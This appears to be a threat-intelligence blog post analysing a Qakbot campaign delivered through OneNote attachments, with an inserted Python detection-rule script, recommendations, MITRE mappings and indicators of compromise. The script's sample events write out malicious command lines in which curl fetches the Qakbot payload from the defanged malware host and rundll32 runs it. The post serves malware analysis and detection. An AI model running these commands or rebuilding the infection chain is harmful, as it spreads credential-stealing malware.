URL: https://blog.cyble.com/2023/02/01/qakbots-evolution-continues-with-new-strategies/
QAKBOT’S EVOLUTION CONTINUES WITH NEW STRATEGIES

February 1, 2023

THREAT ACTOR LEVERAGING MICROSOFT ONENOTE TO INFECT USERS

Threat Actors (TAs) continuously adopt new tactics for infecting users for
several reasons, including avoiding detection by anti-virus solutions,
increasing the likelihood of successful infections, and seeking the challenge of
creating new methods of infecting victims.

Recently, several malware families have been spotted using OneNote attachments
in their spam campaigns. OneNote is a powerful digital notebook tool offered by
Microsoft. It provides users with a centralized location to store their
thoughts, ideas, and notes in an organized manner.  

In December, Trustwave discovered that Formbook malware was being delivered
through spam emails containing OneNote attachments. Since then, various malware
families, including Redline Stealer and AsyncRAT, have started incorporating
OneNote attachments into their spam campaigns. Cyble Research Intelligence Labs
(CRIL) has also observed the Qakbot malware using OneNote attachments in its
campaigns.


INITIAL INFECTION



The initial infection starts with a spam email containing a OneNote attachment.
When the user opens the attachment, it drops an embedded .hta file, which is
executed by mshta.exe. This downloads a Qakbot DLL file, which is then executed
by rundll32.exe. The figure below shows the Qakbot delivery mechanism.

Figure 1: Qakbot delivery mechanism




TECHNICAL ANALYSIS



The spam email has the subject line “OFERTA PO# 000938883 NSS” and carries a
OneNote attachment named “ApplicationReject_68390(Jan31).one”, as shown in Figure 2.

Figure 2: Initial Spam email containing OneNote file.


When the user opens the OneNote attachment, it shows a fake OneNote page that
appears to contain an attachment from the cloud. This page tricks the user into
double-clicking to view the attachment, which initiates the Qakbot infection
process.

The figure below shows the Fake OneNote Page.

Figure 3: Fake OneNote Page



After clicking the “open” button on the OneNote page, it silently drops a .hta
file named “attachment.hta” in the background and executes it using mshta.exe.

The figure below shows the content of the .hta file.

Figure 4: Source code of the .hta file



The .hta file contains two JavaScript blocks and two VBScript blocks and
performs the following operations when executed.

 1. First, the JavaScript reads the obfuscated data from a <div> element and
    stores it in a variable named “content”.
 2. The VBScript then creates a string value “Name” under the registry key
    HKEY_CURRENT_USER\SOFTWARE\Firm\Soft and writes the obfuscated content
    from the previous step into it.
 3. Another JavaScript block reads the obfuscated content back from the
    registry and turns it into an anonymous function using the replace
    method.

The figure below shows the anonymous function.

Figure 5: An Anonymous function



 * This JavaScript also calls the anonymous function, passing the URL
   “hxxp://77[.]75[.]230[.]128/19825[.]dat” to it as an argument.
 * The anonymous function creates a WScript.Shell object and executes
   curl.exe to download the “19825.dat” file from the remote server, saving
   it in the %ProgramData% directory as “121.png”. “121.png” is a Qakbot DLL
   file, which the JavaScript then executes using rundll32.exe.
 * After execution, the last VBScript block in the .hta file deletes the
   registry value “Name” and shows a fake message to the victim, as shown
   below.

Figure 6: Displaying a Fake message to the victims
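The chain described in the steps above (OneNote spawning mshta.exe, the staging value written under HKCU\SOFTWARE\Firm\Soft, curl.exe fetching the payload into %ProgramData%, and rundll32.exe loading a DLL named as a .png) maps onto a handful of host-level detection rules. The Python below is an added example written for this page, not code from the original post or from Cyble. It runs over a constructed set of Sysmon-style events: the field names, the temp path, the user name and the rundll32 export name are assumptions, while the download URL, file names and registry path are the ones the post reports. Each rule flags one stage, and chain_observed reports whether every stage is present in the event set.

```python
"""Detection rules for the OneNote -> mshta.exe -> curl.exe -> rundll32.exe chain.

Added example: runs over constructed Sysmon-style events (process creation and
registry value set). Nothing here is the page's own code or telemetry.
"""
import ntpath
import re

# Constructed sample telemetry. Field names follow a Sysmon-like layout but are
# assumptions. The URL, "attachment.hta", "121.png" and the registry path come
# from the post; the temp path, user name and export name are placeholders.
SAMPLE_EVENTS = [
    {"type": "process",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Users\victim\AppData\Local\Temp\attachment.hta"'},
    {"type": "registry",
     "image": r"C:\Windows\System32\mshta.exe",
     "key": r"HKCU\SOFTWARE\Firm\Soft\Name"},
    {"type": "process",
     "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe hxxp://77[.]75[.]230[.]128/19825[.]dat -o C:\ProgramData\121.png'},
    {"type": "process",
     "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe C:\ProgramData\121.png,EntryPoint'},  # export name is a placeholder
    # Benign look-alikes that the rules must not flag.
    {"type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe https://example.com/notes.txt -o C:\Users\admin\notes.txt'},
    {"type": "process",
     "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'},
]


def _base(path):
    """Lower-cased file name component of a Windows path."""
    return ntpath.basename(path).lower()


def rundll32_module(cmdline):
    """Return the module argument of a rundll32 command line (the token after the
    executable, before any ',Export' suffix), or None if it cannot be found."""
    m = re.match(r'\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+"?([^",]+)', cmdline, re.I)
    return m.group(1).strip() if m else None


def onenote_spawns_mshta(e):
    """OneNote launching the HTML application host (stage 1 of the chain)."""
    return e["type"] == "process" and _base(e["parent"]) == "onenote.exe" and _base(e["image"]) == "mshta.exe"


def hta_registry_staging(e):
    r"""mshta.exe writing the staging value HKCU\SOFTWARE\Firm\Soft\Name."""
    return (e["type"] == "registry" and _base(e["image"]) == "mshta.exe"
            and e["key"].lower() == r"hkcu\software\firm\soft\name")


def mshta_spawns_curl(e):
    """mshta.exe using curl.exe as its downloader."""
    return e["type"] == "process" and _base(e["parent"]) == "mshta.exe" and _base(e["image"]) == "curl.exe"


def curl_writes_to_programdata(e):
    """curl.exe writing its output file under ProgramData, as with 121.png."""
    if e["type"] != "process" or _base(e["image"]) != "curl.exe":
        return False
    m = re.search(r'(?:-o|--output)\s+"?([^"\s]+)', e["cmdline"], re.I)
    return bool(m) and m.group(1).lower().startswith("c:\\programdata\\")


def rundll32_non_dll_module(e):
    """rundll32.exe loading a module whose extension is not .dll (121.png here)."""
    if e["type"] != "process" or _base(e["image"]) != "rundll32.exe":
        return False
    mod = rundll32_module(e["cmdline"])
    return mod is not None and not mod.lower().endswith(".dll")


RULES = {
    "onenote_spawns_mshta": onenote_spawns_mshta,
    "hta_registry_staging": hta_registry_staging,
    "mshta_spawns_curl": mshta_spawns_curl,
    "curl_writes_to_programdata": curl_writes_to_programdata,
    "rundll32_non_dll_module": rundll32_non_dll_module,
}


def scan(events):
    """Return (event_index, rule_name) for every rule that each event trips."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES.items() if rule(e)]


def chain_observed(events):
    """True when every stage of the chain appears somewhere in the event set."""
    return {name for _, name in scan(events)} == set(RULES)


if __name__ == "__main__":
    for i, name in scan(SAMPLE_EVENTS):
        print(f"event {i}: {name}")
    print("full chain observed:", chain_observed(SAMPLE_EVENTS))
```

Each rule is deliberately narrow so that it stays quiet on the benign look-alikes at the end of the sample (explorer.exe running curl to a user directory, svchost.exe running rundll32 on shell32.dll); the rundll32 rule keys on the extension mismatch rather than on the specific name “121.png”, so it also covers renamed payloads the post does not list.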



The figure below shows the Qakbot process tree. After the DLL file is executed,
it injects malicious code into “wermgr.exe” to carry out its stealing activities.

Figure 7: Qakbot Process tree.



Qakbot can steal sensitive information such as usernames, passwords, and cookies
from browsers, as well as emails from an infected machine. It can also spread to
other devices within the network and deploy other malware families, such as
ransomware.


CONCLUSION



Qakbot is a prevalent and constantly evolving malware that can have serious
consequences for its victims, such as financial fraud and identity theft. In
this case, the Qakbot malware spreads via spam emails containing OneNote
attachments. Cyble Research Labs is monitoring the activity of Qakbot and will
continue to inform our readers about any updates promptly.


OUR RECOMMENDATIONS



 * Do not open emails from unknown or unverified senders.
 * Avoid downloading pirated software from unverified sites.
 * Use strong passwords and enforce multi-factor authentication wherever
   possible.
 * Rotate passwords at regular intervals.
 * Use reputed anti-virus solutions and internet security software packages on
   your connected devices, including PCs, laptops, and mobile devices.
 * Avoid opening untrusted links and email attachments without first verifying
   their authenticity.
 * Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
 * Monitor beaconing at the network level to block data exfiltration by malware
   or TAs.
 * Enable Data Loss Prevention (DLP) solutions on employees’ systems.


MITRE ATT&CK® TECHNIQUES



Tactic                 Technique ID   Technique Name
Initial Access         T1566          Phishing
Execution              T1204          User Execution
Execution              T1059          Command and Scripting Interpreter
Execution              T1218          Rundll32
Execution              T1047          Windows Management Instrumentation
Defense Evasion        T1027          Obfuscated Files or Information
Command and Control    T1071          Application Layer Protocol
Command and Control    T1095          Non-Application Layer Protocol


INDICATORS OF COMPROMISE (IOCS)

Indicator                                                          Indicator Type   Description
b53bc20c9191f83e511c617ec7b8a5e05d5b77be5a1e44276f8cae761010d7d7   SHA256           Eml File
f18f10f9b74b987bf98d163bdfb7b619dcb7b39b3349ae3ccdcc5f348d6e0c75   SHA256           OneNote File
7a51e7dec2080d22fea9edd2757b68687a7ba8c4dd1ba83ea7e68dc73539134b   SHA256           .HTA File
26b4c1b52c357b6c876c28ccbe95b86f93767142c050952c92cd774cc7dd8d37   SHA256           Qakbot Dll
hxxp://77[.]75[.]230[.]128/19825[.]dat                             URL              Download URL
